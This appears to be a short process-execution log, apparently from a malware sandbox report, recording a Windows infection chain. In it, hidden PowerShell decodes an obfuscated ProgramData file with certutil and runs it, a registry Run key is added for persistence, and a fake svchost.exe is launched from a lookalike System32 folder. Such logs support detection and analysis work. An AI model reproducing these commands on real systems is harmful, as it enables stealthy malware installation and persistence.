powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\bgn9jPn.g6Ky C:\Windows\..\ProgramData\jB2OWAx.lEKR
2788certutil.exe "C:\Windows\system32\certutil.exe" -decode C:\Windows\..\ProgramData\bgn9jPn.g6Ky C:\Windows\..\ProgramData\jB2OWAx.lEKR
2904powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden cmd /c cmd /c C:\Windows\..\ProgramData\jB2OWAx.lEKR --user
2964reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /d "\"C:\ProgramData\System32\svchost.exe\" --help" /t REG_SZ /v "System" /f
1356svchost.exe "C:\ProgramData\System32\svchost.exe" --help "C:\ProgramData\jB2OWAx.lEKR"
2176